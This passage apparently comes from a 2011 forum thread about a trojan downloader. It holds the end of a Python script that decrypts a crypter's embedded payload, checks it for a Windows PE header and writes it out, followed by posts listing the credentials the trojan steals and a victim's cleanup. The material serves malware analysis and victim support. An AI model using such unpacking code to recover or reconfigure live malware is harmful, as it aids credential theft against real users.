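    return unpad.update(padded) + unpad.finalize()


def looks_like_pe(data: bytes) -> bool:
    """Cheap sanity check: 'MZ' header and 'PE\\0\\0' at e_lfanew (offset 60)."""
    if len(data) < 64 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[60:64], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


if __name__ == "__main__":
    # usage: unpack.py <dumped "crypted" resource> <settings string> <output file>
    blob = open(sys.argv[1], "rb").read()
    cfg = parse_settings(sys.argv[2])
    out = decrypt_payload(blob, cfg["password"])
    print("features:", enabled_features(sys.argv[2]), "inject into:", cfg["inject_into"])
    print("PE header ok:", looks_like_pe(out))
    open(sys.argv[3], "wb").write(out)
```

The "crypted" resource is the raw byte[] from the stub's resources; if you extracted it as the Base64 text the RunPE source embeds, base64-decode it first.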
#8 19 February 2011 Re: Win32.Trojan-Downloader.MSIL.Agent.xf.3.a
Yep, then your system should already be clean. Here's a short list of what it steals:
- FlashFXP/SmartFTP
- Opera/Firefox/Chrome/IE
- MSN/Trillian
- Steam
The list is not complete, but FlashFXP in particular should interest you^^
#9 19 February 2011 Re: Win32.Trojan-Downloader.MSIL.Agent.xf.3.a
Well, he can't do anything with the FTP data. ICQ has already been changed, at least the UIN where I know the password myself. Trillian Astra doesn't even offer the option to change the password, great service... but thanks for the list.